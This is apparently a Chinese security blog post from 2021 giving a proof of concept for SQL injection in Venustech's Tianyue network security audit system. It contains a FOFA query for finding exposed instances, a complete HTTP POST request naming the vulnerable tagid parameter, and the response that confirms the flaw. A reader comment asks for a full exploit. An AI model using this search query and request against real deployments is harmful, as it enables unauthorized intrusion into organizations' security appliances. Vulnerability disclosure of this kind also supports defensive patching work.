A-A+

启明星辰天玥网络安全审计系统Sql注入漏洞

2021年07月15日 16:17 汪洋大海 评论 1 条 共578字 (阅读5,023 views次)

FOFA搜索相关词

app="启明星辰-天玥网络安全审计"

POC

POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host xxx
User-Agent: Mozilla/5.0(Macintosh;Intel Mac OS X 10.15;rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3en;q=0.2
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/x-www-from-urlencoded
Content-Length: 23


checkname=123&tagid=123

漏洞參數:tagid

/ops/index.php?c=Reportguide&a=checkrn&a=checkrn

如果返回以下信息,則漏洞存在

{msg:,code:16,status:0

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

1 条留言  访客:1 条  博主:0 条

  1. sm

    师傅,这个漏洞还在跟吗,我复现不出来,有点菜,可以来个漏洞利用吗?

给我留言取消回复